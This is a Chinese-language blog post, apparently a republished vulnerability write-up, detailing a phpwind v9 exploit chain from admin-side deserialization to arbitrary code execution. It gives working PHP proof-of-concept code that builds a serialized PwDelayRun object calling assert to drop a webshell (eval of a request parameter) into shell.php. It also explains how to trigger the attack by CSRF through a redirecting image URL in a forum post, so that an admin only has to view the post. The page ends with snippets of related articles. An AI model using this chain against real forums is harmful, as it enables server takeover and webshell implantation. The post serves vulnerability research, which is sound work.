用友漏洞php,Phpwind GET型CSRF任意代码执行漏洞公开

最新推荐文章于 2021-07-12 13:14:32 发布
最新推荐文章于 2021-07-12 13:14:32 发布
阅读量446 收藏
点赞数
文章标签: 用友漏洞php

这个洞其实很有意思,最可惜的地方就是其触发位置在后台,否则它将是一个绝无仅有的好洞。

0x01 后台反序列化位置

首先纵览整个phpwindv9,反序列化的位置很多,但基本都是从数据库里取出的,很难完全控制序列化字符串。
最后,找到三处:

ea9527836dd324676cfaa1fc9c617dbf.png

可恶的是,三处都在后台的Task模块下。Task模块是『任务中心』功能,只有能进入后台的用户才可以访问:

d39ca13b3cd900286dd1f7c4b3821711.png

随便打开一个, src/applications/task/admin/TaskConditionMemberController.phpclass TaskConditionMemberController extends AdminBaseController{

/* (non-PHPdoc)

* @see AdminBaseController::beforeAction()

*/

public function beforeAction($handlerAdapter) {

parent::beforeAction($handlerAdapter);

$var = unserialize($this->getInput('var'));

if (is_array($var)) {

$this->setOutput($var, 'condition');

}

}

beforeAction将会在实际执行Action之前执行。这里$var = unserialize($this->getInput('var'));,从Input中获取var参数的值,进行反序列化。
这个Input可以来自get/post/cookie。我们只要在phpwind里找到反序列化可以利用的点,就能在这里触发反序列化漏洞。

0x02 PwDelayRun类__destruct方法

全局搜一下关键词__destruct,很快找到了PwDelayRun类:class PwDelayRun {

private static $instance = null;

private $_callback = array();

private $_args = array();

private function __construct() {

}

public function __destruct() {

foreach ($this->_callback as $key => $value) {

call_user_func_array($value, $this->_args[$key]);

}

}

...

}

可见__destruct方法,其中遍历了_callback数组,用call_user_func_array执行任意函数。这里如果_callback可控,那么就可以直接执行assert+任意代码了。
原本是一个十分简单的漏洞,但我们在TaskConditionMemberController::beforeAction::unserialize里下断点,执行var_dump(get_declared_classes());exit;,查看当前已经定义的类:Array

(

[0] => stdClass

[1] => Exception

...

[330] => WindMysqlPdoAdapter

[331] => WindResultSet

[332] => AdminUserBo

[333] => AdminLogService

[334] => WindFile

)

其中并没有PwDelayRun类。看来在反序列化的时候,并没有加载这个类,所以我即使构造了利用方法,也『造』不出PwDelayRun对象。
那怎么办?

0x03 利用spl_autoload包含任意php文件

在Joomla那个反序列化漏洞( https://**.**.**.**/PENETRATION/joomla-unserialize-code-execute-vulnerability.html )里,提到了一个方法。
因为Joomla内的spl_autoload会根据类名自动加载文件,所以当时构造了一个JSimplepieFactory类对象,而factory.php中包含了import目标类的方法:

5a77b43266e366e6fbb884b637a57c00.png

所以成功反序列化了simplepie类。
回到Phpwind。同道理,我们在Phpwind中看看哪些文件包含了PwDelayRun:

d0f429f404d45c6146cee7ad10a35fad.png

静态包含PwDelayRun的就只有PwConfigService类。我在刚才获得的类里看看,不幸的是,PwConfigService也没有加载。
继续查找PwConfigService,并没有静态加载这个类的方法:

10497c54e5da2da3563a68d83e5e6622.png

所以我们这个链就断了。
但利用spl_autoload这个思路不能断,我们思考一下,现代php框架中必然存在autoload,在反序列化的过程中发现了不存在的类『PwDelayRun』,就会直接传入注册好的spl_autoload函数中。我在 /wind/Wind.php 中,可以找到spl_autoload_register函数的调用:public static function init() {

self::$isDebug = WIND_DEBUG;

function_exists('date_default_timezone_set') && date_default_timezone_set('Etc/GMT+0');

self::register(WIND_PATH, 'WIND', true);

if (!self::$_isAutoLoad) return;

if (function_exists('spl_autoload_register'))

spl_autoload_register('Wind::autoLoad');

else

self::$_isAutoLoad = false;

self::_loadBaseLib();

}

将Wind::autoload注册为自动加载函数。跟进Wind::autoLoadpublic static function autoLoad($className, $path = '') {

if ($path)

include $path . '.' . self::$_extensions;

elseif (isset(self::$_classes[$className])) {

include self::$_classes[$className] . '.' . self::$_extensions;

} else

include $className . '.' . self::$_extensions;

}

autoLoad第二个参数是没有值的,所以这里,最后会走到这一步:include $className . '.' . self::$_extensions;。
看到include我就有点激动,但静下心想一下发现还是有问题的。因为这里的className是没有路径的,而PwDelayRun类在src/library/utility/PwDelayRun.php文件中,我需要传入路径才可以包含到这个类。
虽然类名不能包含特殊字符,但其实类名中是可以包含\的:

597c60e409f9dcd87d3b93f8c687186a.png

这涉及到php中的命名空间的知识。学过新型框架的同学肯定对命名空间十分熟悉,所以我没必要多介绍。命名空间中可以包含\,而在windows下,\也可以作为路径的分隔符。(由此可见,这个漏洞仅限于Windows服务器)
所以这里,我可以将类名设置为src\library\utility\PwDelayRun(其实就是src\library\utility命名空间下的PwDelayRun类),最后在Wind::autoload里进行包含 include src\library\utility\PwDelayRun.php

0x04 利用数组+命名空间加载相同名字的类

还有一个问题,我们这里将类名设置为src\library\utility\PwDelayRun,而:整个phpwind全局是没有使用命名空间的,也就是默认命名空间为\,但现在的PwDelayRun类所在的命名空间为src\library\utility。
这样,即使我包含了src\library\utility\PwDelayRun.php文件,反序列化的时候是实例化的src\library\utility\PwDelayRun类。但phpwind的命名空间是\,上下文存在的类是\PwDelayRun类,还是无法正常进行(因为找不到src\library\utility\PwDelayRun类)。
我想了一下,其实也好办,只要变通一下。我们只要生成src\library\utility\PwDelayRun类和\PwDelayRun类两个对象,放在一个数组中,在反序列化前者的过程中include目标文件,在反序列化后者的过程中拿到PwDelayRun对象。
我构造了一个POC:// test1.php

header("Content-Type: text/plain");

require_once "test2.php";

class PwDelayRun{

private $_callback;

private $_args;

function __construct()

{

$this->_callback = [

'assert'

];

$this->_args = [

["phpinfo();exit;"]

];

}

}

$obj = [

new src\library\utility\PwDelayRun(),

new PwDelayRun()

];

echo urlencode(serialize($obj));

//test2.php

namespace src\library\utility;

class PwDelayRun{

}

执行test1.php即可拿到POC对象。

88e17782af1d6800d5a16be09331abf9.png

将这个字符串传入var参数,结果……

bb749af4954d4832f708bd4be332efb2.png

啥事也没发生……这是什么情况?

0x05 利用stdClass代替数组绕过限制

我们回看TaskConditionMember类,看看反序列化的那个beforeAction函数:public function beforeAction($handlerAdapter) {

parent::beforeAction($handlerAdapter);

$var = unserialize($this->getInput('var'));

if (is_array($var)) {

$this->setOutput($var, 'condition');

}

}

后面有个判断is_array,是它在捣鬼。
如果var是数组的话,就设置到output里。所以,最后该对象并没有销毁,没有销毁那么实际上就没有调用__destruct函数,所以也无法执行任意代码了。
要让is_array返回false,只需序列化一个非数组对象即可。其实在php源码层,对象是用数组来模拟的,我们只需要用一个对象代替数组即可。
php最简单的对象就是stdClass,我将POC改为如下即可:// test.php

header("Content-Type: text/plain");

require_once "test2.php";

class PwDelayRun{

private $_callback;

private $_args;

function __construct()

{

$this->_callback = [

'assert'

];

$this->_args = [

["phpinfo();file_put_contents('shell.php','<?php eval(\$_REQUEST[233]); ?>');exit;"]

];

}

}

$obj = new stdClass();

$obj->a = new src\library\utility\PwDelayRun();

$obj->b = new PwDelayRun();

echo urlencode(serialize($obj));

生成序列化字符串:

eaaf3f269682c74af36fbd5fd57ef259.png

传入var参数:

46437037d97b451a2095c67557724d54.png

万事大吉,成功!管理员只需拥有后台『论坛任务』功能,即可直接执行任意代码。

0x06 前台利用CSRF起飞

这个漏洞本是一个利用技巧很妙的漏洞,但最关键的问题是其出现在后台,利用门槛太高。
但这个漏洞又有一个特点,那就是其为GET方法,只需要一个URL即可触发。所以,我们可以用类似Discuz这个漏洞的方法: http://**.**.**.**/bugs/wooyun-2014-064886 ,将URL插入前台帖子的图片中:

88c7c33f94e315827ab14c13f2fc7a64.png

结果……phpwind给我把&都转义了,无法正常执行。
不过没关系,只要我写一个302跳转,跳转到目标URL即可:

4169e4666e0bbdb7851b4781a99b251c.png

将这个php作为图片地址写入帖子:

a26940b3b2851e107f3a7576f70dfcc8.png

管理员浏览:

6d68abf566d2f602862efe827114d6e6.png

获得webshell:

9103c6de70354aaca120510dfcad42d8.png

仓耘
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpwind暴出跨站漏洞,小漏洞,大危害
网络——菜市场
10-19 2571
 phpwind暴出跨站漏洞,小漏洞,大危害来源:华夏黑客联盟(www.hxhack.com)前言:大家都应该知道,国内主流论坛程序主要有两大家,一种是phpwind论坛程序,一种是dz论坛程序;不知道的,百度搜索一下便知道了。我也是无意间发现这个漏洞的,如果有人恶意利用以下的方法,谁又会想到phpwind官方网站竟然会被人通过这样的方法挂马?小漏洞存在的危害并不小!所以提醒广大的网民一定要警惕网
php最大的论坛,phpwind论坛史上最大漏洞 -电脑资料
weixin_31131927的博客
03-12 945
发表于家用电脑2007年第19期文/图:飘忽不定就在最近的一个月,国内的一些著名论坛相继被黑,而这些论坛采用的基本都是PHPwind论坛系统,管理员密码,而入侵的过程仅仅只需要十几秒种。截至目前,国内大约有1/3采用PHPwind论坛程序的网站被黑,无数网站被恶意挂马、篡改甚至直接删除数据。而目前,网络上仍然存在不少没有填补该漏洞的网站。本文将为大家揭开此次事件的真相,并给广大站长以及个人建站爱好...
phpwind高危通讯秘钥安全漏洞及修复方案
10-14 465
东方联盟郭盛华/漏洞描述: phpwind9.x 通讯秘钥漏洞可导致前台Getshell。 影响版本: 9.x 漏洞等级: 高危 修复建议: 1、安装官方补丁包:http://www.phpwind.net/read/3709549 2、使用百度云加速WAF防火墙进行防御。 3、添加网站至云观测,及时了解网站组件突发/0day漏洞。 ...
Phpwind出现严重安全漏洞
好好学习,天天向上
01-10 943
近日,国内知名的社区PHPWIND又现严重漏洞,程序中有部分变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令,官方针对这个漏洞已经做出了修补。 phpwind 7.5 Multiple Include Vulnerabilities author: 80vulteam:http://www.80vul.com一.api/class_base.php本地包含漏洞1.描叙 api/cla
PHPwind后台获取Webshell
Flashlm专栏
08-01 3567
发现的一个phpwind漏洞搞的热闹非凡,该漏洞是因为message.php 文件的几个变量未进行过滤造成的。官方已发布补丁,所以我在这里摘一点关于取得管理密码后怎么拿webshell的方法:方式1 模板法 进入后台, 风格模版设置 ,在随便一行写代码记住,这代码必须顶着左边行写,代码前面不可以有任何字符。EOT;eval($a);print 例如,我写完某一行为。.headurl { color
PHP代码审计之CSRF-CSRF漏洞源码审计总结
最新发布
04-09
PHP代码审计之CSRF/CSRF漏洞源码审计总结 DedeCMS-V5.7-U TF8-SP2.tar.gz DedeCMS-V5.7-UTF8-SP2.tar .gz DedeCMS-V5.7-UTF8-SP2.tar.gz PHP代码审 计之CSRF.part2.rar (15.67 MB)
CSRF漏洞的靶场实验
09-19
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全漏洞,它允许攻击者在用户已登录且浏览器保持会话状态的情况下,诱使用户执行非本意的操作。在“CSRF漏洞的靶场实验”中,我们将通过实际操作...
基础漏洞csrf挖掘实战
10-07
跨站请求伪造(CSRF)是一种网络攻击方式,它利用了用户浏览器的已登录状态,使攻击者能够以受害者的身份执行非授权的操作。攻击者通常借助受害者在其他网站上的合法会话,通过诱导受害者点击恶意链接或者加载含有...
hucart-含有CSRF漏洞的源码.zip
12-31
CSRF(Cross-Site Request Forgery,跨站请求伪造)是一种常见的网络安全问题,它允许攻击者在用户已登录的情况下,诱导用户浏览器执行非本意的操作。在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际...
espcms csrf漏洞 导致任意管理员添加1
08-03
然而,该系统在其后台管理界面存在一个严重的CSRF(Cross-Site Request Forgery,跨站请求伪造)漏洞,允许攻击者在没有权限的情况下任意添加管理员账号。由于在管理员添加页面缺少了必要的CSRF防护令牌,攻击者可以...
PHPWIND创始人密码恢复工具
02-27
PHPWIND创始人密码恢复工具
PHP又有重大漏洞,PHPWind重大漏洞 大量论坛被夺管理权
weixin_34135138的博客
04-02 468
4月6日傍晚,PHPWind论坛系统漏洞在互联网上爆发,一时间,众多站点开始提供此系统漏洞的恶意攻击工具,大量站点被恶性入侵并删除数据,后台管理员密码无法登陆。大旗、BTCHINA等站点进行关闭修复,而有站点则被删除十万以上数据。今天官方网站论坛又遭到了DDOS攻击。据PHPWind官方表示,PHPWind作为国内被广泛应用的BBS系统程序,在国内互联网中,几乎约占1/3的站点在同时使用该程序,显...
编写Poc:Yapi远程命令执行漏洞
soldi_er的博客
07-12 890
文章目录使用Docker构建Yapi(Ubuntu环境)访问yapi镜像,测试漏洞自动化探测脚本FOFA批量探测(python3)单url探测(python2)参考 使用Docker构建Yapi(Ubuntu环境)   (1)创建mongoDB数据卷: docker volume create mongo_data_yapi   (2)启动MongoDb docker run -d --name mongo-yapi -v mongo_data_yapi:/data/db mongo   (3)从阿里
php漏洞论坛,PHPWIND1.3.6论坛漏洞分析
weixin_40005373的博客
03-20 498
PHPWIND 论坛是一款流行的PHP 论坛,界面美观,功能也比较强大。但大家仔细看一下会发现不论是从界面功能还是代码风格,它和 DISCUZ 都非常相似,具体原因我想也就不用说了,毕竟 DISCUZ 出来比它要早很多。但安全上它没有继承 DISCUZ 的优点, DISCUZ 论坛安全性非常好,而且商家也对此非常重视安全问题,国内论坛中不论从功能还是安全 , 第一非DISCUZ 莫属。PHPWIN...
php漏洞论坛,PHPWind超级漏洞简单用
weixin_42412910的博客
03-20 1923
题目:PHPWind超级漏洞简单用文章作者:hackest [H.S.T]&[L.S.T]&[E.S.T]此文章已发表在《***X档案》第5期杂志上后经本文作者hackest提交到邪恶八进制论坛欢迎大家转载,但请务必要记住注明此信息!一、山雨欲来风满楼近来创办了"十六进制"安全论坛,用的程序是PHPWind5.3,那天早上我正在管理自己的论坛,发现有人在发广告,禁言了他之后,就去删...
phpwind index.php?m=design&c=api,phpwind v9存在命令执行漏洞(登陆后台)
weixin_30249953的博客
03-13 491
已知漏洞:https://www.seebug.org/vuldb/ssvid-94465phpwind v9最新版存在命令执行漏洞(登陆后台)Phpwind_v9.0.2(最新版),phpwind_v9.0.1命令执行高危(getshell)phpwind是一个基于PHP和MySQL的开源社区程序,是国内最受欢迎的通用论坛程序之一。社区可提供丰富的应用,满足人们获取信息、交流、娱乐、消费等生活...
任意命令执行漏洞简介
18年3月萌新白帽子
06-24 3794
命令成因脚本语言有点事简洁,方便,但也伴随一些问题,比如运行速度慢,无法接触系统底层,如果我们开发的应用(特别是企业级的一些应用)需要除去web的特殊功能时,就需要调用一些外部程序。在应用需要去调用外部程序去处理的情况下,就会用到一些执行系统命令的函数。如php中的system,exec,shell_exec等,当用户可以控制命令执行的函数时,可以恶意注入系统命令到正常命令中,造成命令执行PHP...
phpwindexp.php,phpwind 7.5 0day漏洞利用 (EXP发布)
weixin_39912163的博客
03-22 788
phpwind 7.5 Multiple Include Vulnerabilities一.api/class_base.php本地包含漏洞1.描叙api/class_base.php文件里callback函数里$mode变量没有过滤导致任意包含本地文件,从而可以执行任意PHP命令.2. 具体分析api/class_base.php文件里:function callback($mode, $met...
phpwind任意修改管理员密码漏洞
HackCode的专栏
08-07 2724
 漏洞说明:PHPWind 论坛系统 是一套采用 php+mysql 数据库方式运行并可生成 html 页面的全新且完善的强大系统。因具有非凡的访问速度和卓越的负载能力而深受国内外朋友的喜爱。但是80sec在其中发现了一个安全漏洞,成功利用此漏洞可以直接修改管理员的密码进入后台,取得管理员权限。漏洞厂商:http://www.phpwind.net漏洞来源:http://www.80s
PHP漏洞深度解析:1-9常见攻击与防范策略
10. **文件上传漏洞(FileUploadAttack)**: 如果文件上传验证不足,恶意用户可能会上传可执行文件或包含恶意代码的文件,威胁服务器和系统安全。 11. **目录穿越漏洞(DirectoryTraversal)**: 攻击者通过恶意输入访问...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值